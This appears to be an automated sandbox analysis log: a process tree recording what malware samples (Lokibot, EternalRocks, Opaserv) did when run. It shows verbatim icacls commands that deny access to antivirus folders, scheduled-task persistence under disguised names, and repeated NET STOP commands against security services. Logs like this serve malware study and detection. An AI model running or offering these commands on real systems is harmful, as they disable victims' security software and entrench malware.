C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 12⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Stealer\Lokibot.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Stealer\Lokibot.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Stealer\Lokibot.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Stealer\Lokibot.exe"2⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Net-Worm\EternalRocks.exe"1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Net-Worm\Loveware.txt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Net-Worm\Opaserv.l.exe"1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC3⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW3⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC3⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS3⤵
-
-
-
C:\WINDOWS\system\msload.exeC:\WINDOWS\system\msload.exe2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP PERSFW3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP PERSFW4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP AVPCC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP AVPCC4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP MCSHIELD3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP MCSHIELD4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP SWEEPSRV.SYS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP SWEEPSRV.SYS4⤵
-
-
-
C:\Windows\SysWOW64\NET.exeNET STOP NAVAPSVC3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 STOP NAVAPSVC4⤵
-
-
-
